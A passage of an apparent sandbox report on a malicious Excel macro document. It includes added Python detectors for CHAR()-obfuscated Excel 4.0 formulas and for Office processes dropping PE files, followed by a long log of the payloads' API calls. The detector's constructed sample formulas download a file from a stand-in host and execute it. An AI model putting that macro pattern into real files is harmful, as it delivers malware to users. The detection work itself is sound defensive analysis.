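    if char_calls >= char_threshold:
        findings.add(f"obfuscated: high usage of CHAR() function: {char_calls}")
    if hidden_sheet_bytes >= sheet_threshold:
        findings.add(f"abnormal large hidden macro sheet: {hidden_sheet_bytes} bytes")
    for f in formulas:
        decoded = decode_char_concat(f)       # inspect the de-obfuscated form
        for name in FUNC_NAME.findall(decoded.upper()):
            if name in SUSPICIOUS_FUNCTIONS:
                findings.add(f"suspicious formula: {name}")
        for imp in SUSPICIOUS_IMPORTS:
            if imp.lower() in decoded.lower():
                findings.add(f"malicious: {imp}")
    return sorted(findings)


def _chars(s):
    """Build a CHAR()-obfuscated string for the constructed sample."""
    return "&".join(f"CHAR({ord(c)})" for c in s)


# Constructed sample (not the real macro): a hidden sheet spells out the
# download API and library name with CHAR(), calls it, then runs the payload.
SAMPLE_FORMULAS = [
    "=" + _chars("URLDownloadToFileA"),
    '=CALL(' + _chars("urlmon") + ',A1,"JJCCJJ",0,"http://example.invalid/15.gif",'
    '"C:\\Gm238uw8\\Fzr3bP\\Msysprotect.exe",0,0)',
    '=EXEC("C:\\Gm238uw8\\Fzr3bP\\Msysprotect.exe")',
    "=HALT()",
]

if __name__ == "__main__":
    for line in triage_formulas(SAMPLE_FORMULAS, hidden_sheet_bytes=502841):
        print(line)
```

Running the decoder first matters: on the raw formulas the only function name visible is CHAR, and the API string does not exist anywhere in the file, which is exactly why the sandbox counts CHAR() calls as an obfuscation signal rather than relying on string matching alone.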
Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Gm238uw8\Fzr3bP\Msysprotect.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\15[1].gif
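Both files EXCEL.EXE created above are PE images, although the second one is cached as 15[1].gif. A file-creation detection that keys on extension alone would miss it, so the check has to look at content. The script below is an added example, not part of this report and not a rule shipped with any product. The EVENTS are constructed to mirror the two dropped files listed above; the field names are an assumption modelled on Sysmon FileCreate (Event ID 11) records, and the 'head' field stands in for the first bytes a collector would read from the created file.

```python
"""Flag an Office process writing a PE image to disk, whatever the extension.

Added example, not part of the sandbox report. EVENTS are constructed; field
names are an assumption modelled on Sysmon FileCreate records.
"""
import os

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
                 "msaccess.exe", "mspub.exe", "visio.exe", "onenote.exe"}
EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".cpl", ".ocx", ".sys", ".com"}


def is_pe(head: bytes) -> bool:
    """True when the buffer has an MZ DOS header whose e_lfanew field points
    at a 'PE\\0\\0' signature inside the buffer. Content-based, so a PE
    saved with a .gif name is still recognised."""
    if len(head) < 0x40 or head[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(head[0x3C:0x40], "little")
    return head[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify_file_create(event: dict):
    """Return a verdict string for an Office-originated file creation that
    looks like a dropped executable, or None when the event is uninteresting."""
    image = event["Image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in OFFICE_IMAGES:
        return None
    target = event["TargetFilename"]
    ext = os.path.splitext(target)[1].lower()
    pe = is_pe(event["head"])
    if not pe and ext not in EXECUTABLE_EXTS:
        return None
    if pe and ext not in EXECUTABLE_EXTS:
        return f"office drops PE file (disguised as {ext or 'no extension'}): {image} -> {target}"
    if pe:
        return f"office drops PE file: {image} -> {target}"
    return f"office creates executable-named file without PE header: {image} -> {target}"


def scan(events):
    """Run classify_file_create over a batch and keep the non-None verdicts."""
    return [v for v in (classify_file_create(e) for e in events) if v]


def _pe_head() -> bytes:
    """Constructed minimal PE prefix: MZ header, e_lfanew=0x40, then PE\\0\\0."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)
    dos[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(dos) + b"PE\x00\x00"


EVENTS = [  # constructed, modelled on the dropped files listed in the report
    {"Image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "TargetFilename": r"C:\Gm238uw8\Fzr3bP\Msysprotect.exe", "head": _pe_head()},
    {"Image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\15[1].gif",
     "head": _pe_head()},
    {"Image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "TargetFilename": r"C:\Users\user\Documents\Document 8402.xlsb",
     "head": b"PK\x03\x04" + b"\x00" * 64},   # xlsb is a ZIP container, benign save
    {"Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\user\Downloads\setup.exe", "head": _pe_head()},
]

if __name__ == "__main__":
    for verdict in scan(EVENTS):
        print(verdict)
```

The explorer.exe record is deliberately ignored: this rule is scoped to Office parents, where a PE write is rarely legitimate, so it stays quiet on ordinary downloads and save operations while still catching the renamed payload in the IE cache.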
Source: C:\Gm238uw8\Fzr3bP\Msysprotect.exe | Code function: 4_2_00401749 Sleep,NtTerminateProcess,4_2_00401749
Source: C:\Gm238uw8\Fzr3bP\Msysprotect.exe | Code function: 4_2_00401756 Sleep,NtTerminateProcess,4_2_00401756
Source: C:\Gm238uw8\Fzr3bP\Msysprotect.exe | Code function: 4_2_00401761 Sleep,NtTerminateProcess,4_2_00401761
Source: C:\Gm238uw8\Fzr3bP\Msysprotect.exe | Code function: 4_2_004015FF Sleep,NtTerminateProcess,4_2_004015FF
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9780 ZwMapViewOfSection,LdrInitializeThunk,19_2_673F9780
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9600 ZwOpenKey,LdrInitializeThunk,19_2_673F9600
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9660 ZwAllocateVirtualMemory,LdrInitializeThunk,19_2_673F9660
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F99A0 ZwCreateSection,LdrInitializeThunk,19_2_673F99A0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9820 ZwEnumerateKey,LdrInitializeThunk,19_2_673F9820
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9860 ZwQuerySystemInformation,LdrInitializeThunk,19_2_673F9860
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F98C0 ZwDuplicateObject,LdrInitializeThunk,19_2_673F98C0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673EE730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,19_2_673EE730
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9730 ZwQueryVirtualMemory,19_2_673F9730
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67445F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose,19_2_67445F5F
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67488F6A RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488F6A
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_6744176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose,19_2_6744176C
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9710 ZwQueryInformationToken,19_2_673F9710
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_6746CF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose,19_2_6746CF70
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673E9702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker,19_2_673E9702
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9F70 ZwCreateIoCompletion,19_2_673F9F70
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9770 ZwSetInformationFile,19_2_673F9770
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67446715 memset,memcpy,ZwTraceEvent,19_2_67446715
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673ECF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose,19_2_673ECF6A
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B6F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap,19_2_673B6F60
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673FAF60 ZwSetTimer2,19_2_673FAF60
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9750 ZwQueryInformationThread,19_2_673F9750
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673E174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,19_2_673E174B
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_6746CF30 ZwAlertThreadByThreadId,19_2_6746CF30
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F0F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose,19_2_673F0F48
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9740 ZwOpenThreadToken,19_2_673F9740
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B2FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_673B2FB0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F97A0 ZwUnmapViewOfSection,19_2_673F97A0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F3FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,ZwUnmapViewOfSection,19_2_673F3FA0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673EFF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString,19_2_673EFF9C
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67440FEC ZwDuplicateObject,ZwDuplicateObject,19_2_67440FEC
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673C0FFD RtlInitUnicodeString,ZwQueryValueKey,19_2_673C0FFD
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67465F87 ZwUnmapViewOfSection,19_2_67465F87
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67445780 DbgPrompt,ZwWow64DebuggerCall,19_2_67445780
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673E37EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory,19_2_673E37EB
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673EDFDF ZwAlertThreadByThreadId,19_2_673EDFDF
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673FAFD0 ZwShutdownWorkerFactory,19_2_673FAFD0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673BF7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,19_2_673BF7C0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F97C0 ZwTerminateProcess,19_2_673F97C0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673BB630 ZwWaitForKeyedEvent,19_2_673BB630
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9E30 ZwCancelWaitCompletionPacket,19_2_673F9E30
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67446652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection,19_2_67446652
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9E20 ZwCancelTimer2,19_2_673F9E20
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673BC600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy,19_2_673BC600
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673FAE70 ZwSetInformationWorkerFactory,19_2_673FAE70
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9670 ZwQueryInformationProcess,19_2_673F9670
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67442E14 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67442E14
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673EBE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,19_2_673EBE62
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67483E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,19_2_67483E22
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673FB650 RtlUnhandledExceptionFilter,ZwTerminateProcess,19_2_673FB650
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9650 ZwQueryValueKey,19_2_673F9650
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_6746FE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_6746FE3F
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673FB640 RtlUnhandledExceptionFilter,ZwTerminateProcess,19_2_673FB640
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673DE6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,19_2_673DE6B0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67488ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488ED6
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673EDE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,19_2_673EDE9E
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B2E9F ZwCreateEvent,ZwClose,19_2_673B2E9F
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_6740DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus,19_2_6740DEF0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B3E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_673B3E80
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_674416FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration,19_2_674416FA
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673C76FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose,19_2_673C76FE
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673DE6F9 ZwAlpcSetInformation,19_2_673DE6F9
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673BB6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError,19_2_673BB6F0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_6746BE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,19_2_6746BE9B
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F96E0 ZwFreeVirtualMemory,19_2_673F96E0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B2ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId,19_2_673B2ED8
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67442EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67442EA3
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673E9ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId,19_2_673E9ED0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F96D0 ZwCreateKey,19_2_673F96D0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B66D4 RtlInitUnicodeString,ZwQueryValueKey,19_2_673B66D4
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67483EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error,19_2_67483EBC
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F96C0 ZwSetInformationProcess,19_2_673F96C0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673E4D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,19_2_673E4D3B
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67441D43 ZwQueryInformationThread,19_2_67441D43
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67481D55 ZwFreeVirtualMemory,19_2_67481D55
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673E1520 RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_673E1520
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9520 ZwWaitForSingleObject,19_2_673F9520
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67476D61 ZwAllocateVirtualMemoryEx,19_2_67476D61
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67441D6A ZwWaitForMultipleObjects,19_2_67441D6A
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67441570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose,19_2_67441570
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67441D0B ZwSetInformationProcess,19_2_67441D0B
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9D70 ZwAlpcQueryInformation,19_2_673F9D70
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_6746FD22 ZwQueryInformationProcess,RtlUniform,19_2_6746FD22
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67488D34 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488D34
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F95B0 ZwSetInformationThread,19_2_673F95B0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9DB0 ZwAlpcSetInformation,19_2_673F9DB0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_6746FDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_6746FDD3
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B65A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion,19_2_673B65A0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9DA0 ZwAlpcSendWaitReceivePort,19_2_673F9DA0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B3591 ZwSetInformationFile,19_2_673B3591
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673CDD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData,19_2_673CDD80
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_6746BDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,19_2_6746BDFA
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67471582 ZwTraceEvent,19_2_67471582
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_6747B581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_6747B581
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B95F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,19_2_673B95F0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F95F0 ZwQueryInformationFile,19_2_673F95F0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9DE0 ZwAssociateWaitCompletionPacket,19_2_673F9DE0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B45D0 RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread,19_2_673B45D0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F95D0 ZwClose,19_2_673F95D0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673DEDC4 ZwCancelWaitCompletionPacket,19_2_673DEDC4
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B4DC0 RtlpUnWaitCriticalSection,RtlRaiseStatus,TpWaitForAlpcCompletion,ZwSetEvent,ZwAlpcQueryInformation,19_2_673B4DC0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F95C0 ZwSetEvent,19_2_673F95C0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673DFC39 ZwAssociateWaitCompletionPacket,19_2_673DFC39
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67441C49 ZwQueryInformationProcess,19_2_67441C49
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673FA420 ZwGetNlsSectionPtr,19_2_673FA420
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67463C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory,19_2_67463C60
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F0413 ZwUnmapViewOfSection,19_2_673F0413
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67441C76 ZwQueryInformationProcess,19_2_67441C76
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67488C75 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488C75
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673EAC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,19_2_673EAC7B
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9C70 ZwAlpcConnectPort,19_2_673F9C70
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F5C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory,19_2_673F5C70
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673D746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,19_2_673D746D
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67471411 ZwTraceEvent,19_2_67471411
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67488C14 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488C14
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B5450 RtlClearThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,19_2_673B5450
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673F9C40 ZwAllocateVirtualMemoryEx,19_2_673F9C40
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67488CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488CD6
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67441CE4 ZwQueryInformationProcess,19_2_67441CE4
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_674714FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_674714FB
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_674664FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose,19_2_674664FB
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673FA480 ZwInitializeNlsFiles,19_2_673FA480
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67433C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString,19_2_67433C93
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67474496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,19_2_67474496
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673BF4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,19_2_673BF4E3
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B2CDB RtlFreeHeap,ZwClose,ZwSetEvent,19_2_673B2CDB
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67484CAB ZwTraceControl,19_2_67484CAB
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67489CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67489CB3
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673ECCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx,19_2_673ECCC0
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_673B9335 ZwClose,ZwClose,19_2_673B9335
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67488B58 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488B58
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67446365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy,19_2_67446365
Source: C:\Users\user\AppData\Roaming\bijvfaa | Code function: 19_2_67466369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose,19_2_67466369
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67448372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString,19_2_67448372
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E5306 ZwReleaseKeyedEvent,19_2_673E5306
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B4B00 TpCallbackMayRunLong,ZwSetInformationWorkerFactory,19_2_673B4B00
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9B00 ZwSetValueKey,19_2_673F9B00
